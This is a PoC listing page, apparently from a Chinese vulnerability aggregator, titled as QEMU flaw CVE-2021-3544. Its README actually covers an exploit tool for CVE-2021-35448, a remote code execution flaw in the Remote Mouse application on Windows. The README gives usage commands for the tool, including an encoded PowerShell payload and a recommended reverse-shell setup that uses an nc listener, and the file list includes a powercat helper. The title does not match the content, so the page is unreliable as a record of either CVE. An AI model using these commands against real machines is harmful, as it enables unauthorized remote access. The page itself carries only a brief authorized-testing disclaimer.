CVE-2021-3544 PoC — QEMU 安全漏洞

来源

关联漏洞

Description

POC for CVE-2021-3544 based on https://www.exploit-db.com/exploits/49601

介绍

# CVE-2021-35448 - Remote Mouse Exploit

## Description

This exploit targets the **CVE-2021-35448** vulnerability in the Remote Mouse application (formerly WiFi Mouse). 

# POC
[CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61)

## Usage

### Basic Syntax

```bash
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
```

### Options

- `-t, --target`: Target IP address (required)
- `-p, --payload`: Custom command to execute
- `-r, --reverse`: Reverse shell in IP:PORT format
- `-l, --http`: Local HTTP server in IP:PORT format (required with -r)

### Usage Examples

#### 1. Custom Command

```bash
python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
```

#### 2. Reverse Shell (Recommended)

```bash
# Terminal 1 - Listener
nc -nlvp 4444

# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
```

## Prerequisites

### Required Files

- `CVE-2021-35448.py`: Main exploitation script
- `powercat.ps1`: PowerShell script for reverse shells

### Target System

- Remote Mouse installed and running
- Windows system (tested on Windows 10)

## Warning

⚠️ **ETHICAL USE ONLY** ⚠️

This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use of this exploit is illegal and may result in legal prosecution.

## References


- [WiFi Mouse 1.7.8.5 - Remote Code Execution](https://www.exploit-db.com/exploits/49601)
- [CVE-2021-35448 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-35448)


## Author

Developed for educational and ethical penetration testing purposes.

---

*Last updated: 2025*

文件快照

 [4.0K]  /data/pocs/3153a55c54c02a4a62ef342606372c2ca1297fcb
├── [3.0K]  CVE-2021-35448.py
├── [ 36K]  powercat.ps1
└── [1.6K]  README.md

0 directories, 3 files

备注